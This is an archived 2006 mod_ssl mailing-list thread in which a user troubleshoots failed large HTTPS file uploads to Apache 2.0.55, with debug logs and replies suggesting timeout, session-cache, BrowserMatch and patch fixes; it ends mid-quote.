[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 00c0: 28
9b cb cc 46 4e 5c 5e-ef 7e 8e 43 b4 76 39 14  (...FN\\^.~.C.v9. |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 00d0: 6e
2c d0 fd fa 08 c9 73-0f df b8 c4 14 c4 69 4e  n,.....s......iN |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 00e0: fa
0f 0e 49 29 fd 4f cc-1d f1 56 51 bf aa 09 9b  ...I).O...VQ.... |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 00f0: 5d
6f b5 84 b5 78 07 49-d9 b4 17 5f 22 24 9c 26  ]o...x.I..._"$.& |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0100: 30
ab 32 26 b5 5e f4 b2-4e 82 1b 5f 3e 91 df 25  0.2&.^..N.._>..% |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0110: 00
54 86 cb 0d 2f a3 8d-46 e2 c6 7a 8e 2e 23 9a  .T.../..F..z..#. |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0120: 99
8c ca a5 1a 4e 4f ed-4f 65 d2 46 17 a7 06 07  .....NO.Oe.F.... |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0130: d6
83 9a db 0c 78 24 d4-eb 62 02 74 a9 e7 5c b5  .....x$..b.t..\\. |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0140: f7
0e 16 f1 86 2c b7 45-96 65 77 6b ce dc 2e     .....,.E.ewk...  |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1490):
+-------------------------------------------------------------------------+
[Thu Apr 20 17:04:31 2006] [info] Subsequent (No.3) HTTPS request
received for child 1 (server 192.168.2.130:443)
[Thu Apr 20 17:04:46 2006] [debug] ssl_engine_io.c(1523): OpenSSL: I/O
error, 5 bytes expected to read on BIO#81d53d8 [mem: 81eeef8]
[Thu Apr 20 17:04:46 2006] [info] (70007)The timeout specified has
expired: SSL input filter read failed.
[Thu Apr 20 17:04:46 2006] [debug] ssl_engine_kernel.c(1794): OpenSSL:
Write: SSL negotiation finished successfully
[Thu Apr 20 17:04:46 2006] [info] Connection to child 1 closed with
standard shutdown(server 192.168.2.130:443, client 192.168.2.199)

On 4/20/06, Ken Chen  wrote:
> Hi, Cliff,
>
> The below is the error in ssl-error_log when I am trying to save a large =
image:
> [Thu Apr 20 16:55:36 2006] [debug] ssl_engine_io.c(1523): OpenSSL: I/O
> error, 5 bytes expected to read on BIO#81f94a8 [mem: 81f9640]
> [Thu Apr 20 16:55:36 2006] [info] (70007)The timeout specified has
> expired: SSL input filter read failed.
> [Thu Apr 20 16:55:36 2006] [debug] ssl_engine_kernel.c(1794): OpenSSL:
> Write: SSL negotiation finished successfully
> [Thu Apr 20 16:55:36 2006] [info] Connection to child 4 closed with
> standard shutdown(server 192.168.2.130:443, client 192.168.2.199)
> [Thu Apr 20 16:55:36 2006] [debug] ssl_engine_io.c(1523): OpenSSL: I/O
> error, 5 bytes expected to read on BIO#81df970 [mem: 81eaf30]
> [Thu Apr 20 16:55:36 2006] [info] (70007)The timeout specified has
> expired: SSL input filter read failed.
> [Thu Apr 20 16:55:36 2006] [debug] ssl_engine_kernel.c(1794): OpenSSL:
> Write: SSL negotiation finished successfully
> [Thu Apr 20 16:55:36 2006] [info] Connection to child 7 closed with
> standard shutdown(server 192.168.2.130:443, client 192.168.2.199)
>
> Ken
>
>
> On 4/19/06, Cliff Woolley  wrote:
> > On 4/19/06, Ken Chen  wrote:
> >
> > > Now seems when uploading big file has problem in ssl.  When I upload =
a
> > > 3K image file, it's ok.  But when I upload a 35K image file.  It
> > > failed.
> >
> >
> > Ah, I see.
> >
> >
> > > Is there any place to set the cache/buffer?  Or I have to set
> > > SSLSessionCache and SSLSessionCacheTimeout?
> >
> >
> > You should set the session cache anyway (failing to do so will result i=
n a
> > major drop in performance), but this should have no effect on the parti=
cular
> > problem you're describing.
> >
> > > By the way, I don't understand why to use openssl s_client and issue =
a
> > > GET request?  I am uploading file.  Isn't it a POST request?  Can you
> > > have a brief sample how to test?
> >
> >
> > It was unclear to me from your original message that *any* https was
> > working, so I was trying to just give you the most basic test to try.  =
I
> > didn't realize you could upload small files successfully.
> >
> > Did you turn on the ssl debug log and look at the spot in the large fil=
e
> > upload where it failed?
> >
> > --Cliff
> >
>
>
> --
> --------------------------------------------------
> Ken Chen
>


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 20 15:27:21 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BF97F14D890; Thu, 20 Apr 2006 15:27:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nproxy.gmail.com (nproxy.gmail.com [64.233.182.189])
	by master.modssl.org (Postfix) with ESMTP id 829FB14D835
	for ; Thu, 20 Apr 2006 15:27:21 +0200 (CEST)
Received: by nproxy.gmail.com with SMTP id y25so121030nfb
        for ; Thu, 20 Apr 2006 06:27:19 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references;
        b=uXQiTwPRti4UjCHBXFGuN1GZvmgRzCYT7IefNEfKuObRvOZCWtUwj+UwO9oFHfUhyAKpMOnLbX0V6MQLYTInNR9q4G2k5pSxtB4NFUETm9a52jWC14eDGfVkrdWObKAHSyw/MI1X+vxUvSOxwAMPPYXtEvEinZR7WPSd+EyTZdE=
Received: by 10.48.202.3 with SMTP id z3mr451796nff;
        Thu, 20 Apr 2006 06:27:19 -0700 (PDT)
Received: by 10.49.29.14 with HTTP; Thu, 20 Apr 2006 06:27:19 -0700 (PDT)
Message-ID: 
Date: Thu, 20 Apr 2006 09:27:19 -0400
From: "Cliff Woolley" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_21928_19002800.1145539639877"
References: 
	 
	 
	 
	 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Cliff Woolley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_21928_19002800.1145539639877
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 4/20/06, Ken Chen  wrote:
>
> [Thu Apr 20 17:04:46 2006] [debug] ssl_engine_io.c(1523): OpenSSL: I/O
> error, 5 bytes expected to read on BIO#81d53d8 [mem: 81eeef8]
>


Just like it sounds from the message, this error occurs when the call to
SSL_read() in ssl_io_input_read() fails with the system returning an error
of ETIMEUP.  While of course it's possible that something is getting "stuck=
"
somewhere and thus it is taking a really long time and subsequently times
out, my first inclination is to say that your global Timeout value is simpl=
y
set too low.

See http://httpd.apache.org/docs/2.0/mod/core.html#timeout

What value do you have set there?

------=_Part_21928_19002800.1145539639877
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline


On 4/20/06, Ken Chen <chengusky@gmail=
.com> wrote:

[Thu Apr 20 17:04:46 2006] [debug] ssl_engine_io.c(1523): OpenSSL: I/O
e=
rror, 5 bytes expected to read on BIO#81d53d8 [mem: 81eeef8]


Just like it sounds from the message, this error occurs whe=
n the call to SSL_read() in ssl_io_input_read() fails with the system retur=
ning an error of ETIMEUP.  While of course it's possible that somethin=
g is getting "stuck" somewhere and thus it is taking a really lon=
g time and subsequently times out, my first inclination is to say that your=
 global Timeout value is simply set too low.


See http://httpd.apache.org/docs/2.0/mod/core.html#timeout

What =
value do you have set there?


------=_Part_21928_19002800.1145539639877--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 20 15:40:51 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 86F3214D892; Thu, 20 Apr 2006 15:40:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.205])
	by master.modssl.org (Postfix) with ESMTP id B0D1114D88D
	for ; Thu, 20 Apr 2006 15:40:47 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h29so98083wxd
        for ; Thu, 20 Apr 2006 06:40:45 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=LSghT+wOC7CrVXcL2hRnAFfHbk625GVtTZrkceLxahQ/7158JdqIpAYodh/2r/RubvBdSmRFcZSqpqz3LCuuTsQZS2Zoz08F9G2SImbRbO+sSXsagQBVvuCdMDCKM6lRxekkVfreX+8Uq9+UAGhWrC51xn6AtMd7jHuzkJt2xlM=
Received: by 10.70.24.13 with SMTP id 13mr829521wxx;
        Thu, 20 Apr 2006 06:40:45 -0700 (PDT)
Received: by 10.70.13.13 with HTTP; Thu, 20 Apr 2006 06:40:45 -0700 (PDT)
Message-ID: 
Date: Thu, 20 Apr 2006 21:40:45 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 
	 
	 
	 
	 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Cliff:

It's been set as the default one: 300.

I wonder how many I need to set, say possibly my application has the
functionality of uploading attachment, max 2.5MB.

I have tried to search everywhere for solution for the same problem
(ssl_engine_io.c OpenSSL: I/O error).  I surprisingly found that many
people have ever encountered this (page can't be displayed) too,
although mostly in IE 5.  But it claims to set the session cache,
KeepAlive, etc.

FYI, I surprisingly found that sometimes, it's find after I clearing
my IE's cache before connecting to app, maybe it's really related to
the network speed and timeout setting?

Anyway, thank you very much for your detail, kindly and prompt reply.=20
I should try tomorrow when backing to work.  =3D)

Ken



On 4/20/06, Cliff Woolley  wrote:
>
>
> On 4/20/06, Ken Chen  wrote:
> > [Thu Apr 20 17:04:46 2006] [debug] ssl_engine_io.c(1523): OpenSSL: I/O
> > error, 5 bytes expected to read on BIO#81d53d8 [mem: 81eeef8]
> >
>
>
> Just like it sounds from the message, this error occurs when the call to
> SSL_read() in ssl_io_input_read() fails with the system returning an erro=
r
> of ETIMEUP.  While of course it's possible that something is getting "stu=
ck"
> somewhere and thus it is taking a really long time and subsequently times
> out, my first inclination is to say that your global Timeout value is sim=
ply
> set too low.
>
> See http://httpd.apache.org/docs/2.0/mod/core.html#timeout
>
> What value do you have set there?
>


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 21 04:23:27 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 47F6F14D895; Fri, 21 Apr 2006 04:23:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.200])
	by master.modssl.org (Postfix) with ESMTP id D0D3414D83E
	for ; Fri, 21 Apr 2006 04:23:26 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so209813wxc
        for ; Thu, 20 Apr 2006 19:23:24 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=kzqXLgreACWt1VgQjJT7rmNL1sDe9FyyrKsL0U3SfTvlkcDH77+Uds0PryCjAgC6FZMLJkA9j5vgHvpNIvh2odRBZAOpZX1pG/IObYYBEEmUX/WzK1BKZ8Ip3lnrlFfbVfO5ynUfAkEV85lMNnZGL7tFsfH87J+bTLSO53ykVT8=
Received: by 10.70.23.19 with SMTP id 19mr1759694wxw;
        Thu, 20 Apr 2006 19:23:24 -0700 (PDT)
Received: by 10.70.13.13 with HTTP; Thu, 20 Apr 2006 19:23:24 -0700 (PDT)
Message-ID: 
Date: Fri, 21 Apr 2006 10:23:24 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 
	 
	 
	 
	 
	 
	 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Cliff,

I have reset the timeout to 600, but the problem remains.  I wonder
whether it's the timeout problem because the problem appears
immediately after presssing Upload!

Sometimes the problem is "Page can't be displayed; sometimes it is
what I mentioned at the very beginning that file can't been uploaded.

I found that the error I attached:
[Thu Apr 20 17:00:54 2006] [debug] ssl_engine_io.c(1523): OpenSSL: I/O
error, 5 bytes expected to read on BIO#81d9850 [mem: 81e6f20]
[Thu Apr 20 17:00:54 2006] [info] (70007)The timeout specified has
expired: SSL input filter read failed.

IS logging everywhere from times to times in the ssl-error_log even
the page for loading is loaded successfully.

The strangest thing is sometimes nothing is logged in error log when
uploading file.  It just display "Page can't be displayed".  Seems ssl
has done nothing.

If really have to come down to recompile in maintainer mode and
attache a debugger, would you please kindly advice and describe the
brief guides on how to do this?  I am not familiar with it.

Thanks.


Ken

On 4/21/06, Cliff Woolley  wrote:
> On 4/20/06, Ken Chen  wrote:
>
> > Anyway, thank you very much for your detail, kindly and prompt reply.
> > I should try tomorrow when backing to work.  =3D)
>
>
> Let me know what other details you find out.  It might come down to havin=
g
> to recompile apache in maintainer mode and attach a debugger to figure ou=
t
> what's going on...
>
>


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 21 08:19:05 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5B8F114D895; Fri, 21 Apr 2006 08:19:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id EB95014D83E
	for ; Fri, 21 Apr 2006 08:19:04 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11.20060308/8.12.11) with ESMTP id k3L6J3Xr023659;
	Fri, 21 Apr 2006 02:19:03 -0400
Received: from turnip.cambridge.redhat.com (turnip.cambridge.redhat.com [172.16.18.137])
	by int-mx1.corp.redhat.com (8.12.11.20060308/8.11.6) with ESMTP id k3L6J2ve004266;
	Fri, 21 Apr 2006 02:19:02 -0400
Received: from turnip.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by turnip.cambridge.redhat.com (8.13.6/8.13.5) with ESMTP id k3L6J1xr001580;
	Fri, 21 Apr 2006 07:19:01 +0100
Received: (from jorton@localhost)
	by turnip.cambridge.redhat.com (8.13.6/8.13.6/Submit) id k3L6IxDt001577;
	Fri, 21 Apr 2006 07:18:59 +0100
X-Authentication-Warning: turnip.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Fri, 21 Apr 2006 07:18:59 +0100
From: Joe Orton 
To: Ken Chen 
Cc: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
Message-ID: <20060421061859.GA1326@redhat.com>
Mail-Followup-To: Ken Chen , modssl-users@modssl.org
References:          
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Apr 21, 2006 at 10:23:24AM +0800, Ken Chen wrote:
> Cliff,
> 
> I have reset the timeout to 600, but the problem remains.  I wonder
> whether it's the timeout problem because the problem appears
> immediately after presssing Upload!
> 
> Sometimes the problem is "Page can't be displayed; sometimes it is
> what I mentioned at the very beginning that file can't been uploaded.

There are a few things you need to check if you're having problems with 
MSIE:

1) make sure you are using the shmcb session cache

2) make sure you have prevented use of persistent connections, with a 
statement like:

BrowserMatch ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

in the SSL vhost.

3) if you are using an SSL->HTTP reverse proxy, then (2) will not be 
taking effect properly, and you'll need to apply this patch:

http://people.apache.org/~jorton/httpd-2.0.54-ssltrans.patch

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 21 09:19:38 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9FDB714D895; Fri, 21 Apr 2006 09:19:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.200])
	by master.modssl.org (Postfix) with ESMTP id 138B814D83E
	for ; Fri, 21 Apr 2006 09:19:37 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so237963wxc
        for ; Fri, 21 Apr 2006 00:19:35 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=DyhL0g9inHUJKX91xY3teTYPhEYaEGyzgqaeDirEOWAJ/Wz3TQK7SiNB4k8KvP/Kr6gAVWdeNHylJBFeQnB93ne3AOPsneXd76klSG8vDYNKBHp/6M/ji+ult/ACclY+JmIUk/H4J0FI1mlSzD+t3J0s4VSB3jWId2WQayq/zf8=
Received: by 10.70.48.5 with SMTP id v5mr2051583wxv;
        Fri, 21 Apr 2006 00:19:35 -0700 (PDT)
Received: by 10.70.13.13 with HTTP; Fri, 21 Apr 2006 00:19:35 -0700 (PDT)
Message-ID: 
Date: Fri, 21 Apr 2006 15:19:35 +0800
From: "Ken Chen" 
To: "Ken Chen" , modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: <20060421061859.GA1326@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 
	 
	 
	 
	 
	 
	 
	 
	 <20060421061859.GA1326@redhat.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Joe,

We are using 2.0.55 already.  Is it already include that patch?

Ken

On 4/21/06, Joe Orton  wrote:
> On Fri, Apr 21, 2006 at 10:23:24AM +0800, Ken Chen wrote:
> > Cliff,
> >
> > I have reset the timeout to 600, but the problem remains.  I wonder
> > whether it's the timeout problem because the problem appears
> > immediately after presssing Upload!
> >
> > Sometimes the problem is "Page can't be displayed; sometimes it is
> > what I mentioned at the very beginning that file can't been uploaded.
>
> There are a few things you need to check if you're having problems with
> MSIE:
>
> 1) make sure you are using the shmcb session cache
>
> 2) make sure you have prevented use of persistent connections, with a
> statement like:
>
> BrowserMatch ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>
> in the SSL vhost.
>
> 3) if you are using an SSL->HTTP reverse proxy, then (2) will not be
> taking effect properly, and you'll need to apply this patch:
>
> http://people.apache.org/~jorton/httpd-2.0.54-ssltrans.patch
>
> joe
>


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 21 09:26:32 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2EF4114D895; Fri, 21 Apr 2006 09:26:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id BEF2B14D83E
	for ; Fri, 21 Apr 2006 09:26:31 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11.20060308/8.12.11) with ESMTP id k3L7QT3a006270;
	Fri, 21 Apr 2006 03:26:29 -0400
Received: from turnip.cambridge.redhat.com (turnip.cambridge.redhat.com [172.16.18.137])
	by int-mx1.corp.redhat.com (8.12.11.20060308/8.11.6) with ESMTP id k3L7QSoa014323;
	Fri, 21 Apr 2006 03:26:29 -0400
Received: from turnip.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by turnip.cambridge.redhat.com (8.13.6/8.13.5) with ESMTP id k3L7QSb1002753;
	Fri, 21 Apr 2006 08:26:28 +0100
Received: (from jorton@localhost)
	by turnip.cambridge.redhat.com (8.13.6/8.13.6/Submit) id k3L7QSBR002752;
	Fri, 21 Apr 2006 08:26:28 +0100
X-Authentication-Warning: turnip.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Fri, 21 Apr 2006 08:26:28 +0100
From: Joe Orton 
To: Ken Chen 
Cc: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
Message-ID: <20060421072628.GA1851@redhat.com>
Mail-Followup-To: Ken Chen , modssl-users@modssl.org
References:         <20060421061859.GA1326@redhat.com> 
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Apr 21, 2006 at 03:19:35PM +0800, Ken Chen wrote:
> Hi Joe,
> 
> We are using 2.0.55 already.  Is it already include that patch?

No, it will be in 2.0.56 and later.  But note this only applies if you 
are using a reverse proxy, and it only affects the application of the 
BrowserMatch statement - if you don't have the BrowserMatch, it has no 
effect.

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 21 09:42:15 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C93EB14D896; Fri, 21 Apr 2006 09:42:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.199])
	by master.modssl.org (Postfix) with ESMTP id 65B0414D856
	for ; Fri, 21 Apr 2006 09:42:14 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so239757wxc
        for ; Fri, 21 Apr 2006 00:42:13 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=sQSqz1BuwqaZ7WcK9DIJMA5n9QmKc9K0xyjHkgdsfIbffm8dIY0GUaWevQ1KAqHcvuMZwSxl7jxs+Sy0jg+ur3izsQDxWkHoTpKKkakDCLFpM02cOERXQtSpU2H81nDdSCwdGkaLwmlpYPE6UC6QTA7t/DntBKc/OLQ0hn4K+XQ=
Received: by 10.70.47.12 with SMTP id u12mr2007024wxu;
        Fri, 21 Apr 2006 00:42:13 -0700 (PDT)
Received: by 10.70.13.13 with HTTP; Fri, 21 Apr 2006 00:42:13 -0700 (PDT)
Message-ID: 
Date: Fri, 21 Apr 2006 15:42:13 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: <20060421072628.GA1851@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 
	 
	 
	 
	 
	 
	 <20060421061859.GA1326@redhat.com>
	 
	 <20060421072628.GA1851@redhat.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

ic.  Thanks so much.  I will apply that patch and see what is going on late=
r.


On 4/21/06, Joe Orton  wrote:
> On Fri, Apr 21, 2006 at 03:19:35PM +0800, Ken Chen wrote:
> > Hi Joe,
> >
> > We are using 2.0.55 already.  Is it already include that patch?
>
> No, it will be in 2.0.56 and later.  But note this only applies if you
> are using a reverse proxy, and it only affects the application of the
> BrowserMatch statement - if you don't have the BrowserMatch, it has no
> effect.
>
> joe
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 21 10:50:24 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D8B8314D895; Fri, 21 Apr 2006 10:50:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.194])
	by master.modssl.org (Postfix) with ESMTP id 7E0AA14D83E
	for ; Fri, 21 Apr 2006 10:50:23 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so245214wxc
        for ; Fri, 21 Apr 2006 01:50:22 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=kKEImIXMprnvHmCTculeun0P+y1qbIGuIQADOFj47c8Zk75V2GV2Bft57xVi9TGffL0dSc9/EAx88OEGlTjn9cDN0D4ya1+ZCtaXg5QfPJSrekqBwZOoNgkn+efFD6nuUT05VoD1UPhHcISGuUMAjJbgEjIJQxtfvQa71vvAC8A=
Received: by 10.70.42.17 with SMTP id p17mr719966wxp;
        Fri, 21 Apr 2006 01:50:22 -0700 (PDT)
Received: by 10.70.13.13 with HTTP; Fri, 21 Apr 2006 01:50:22 -0700 (PDT)
Message-ID: 
Date: Fri, 21 Apr 2006 16:50:22 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 
	 
	 
	 
	 
	 <20060421061859.GA1326@redhat.com>
	 
	 <20060421072628.GA1851@redhat.com>
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Joe,

Do you mind telling me how to apply the patch?  Type command as follow?
patch -s < xxxx.patch

Do I need to stop the httpd server?  or recompile or anything else?

Thanks.


On 4/21/06, Ken Chen  wrote:
> ic.  Thanks so much.  I will apply that patch and see what is going on la=
ter.
>
>
> On 4/21/06, Joe Orton  wrote:
> > On Fri, Apr 21, 2006 at 03:19:35PM +0800, Ken Chen wrote:
> > > Hi Joe,
> > >
> > > We are using 2.0.55 already.  Is it already include that patch?
> >
> > No, it will be in 2.0.56 and later.  But note this only applies if you
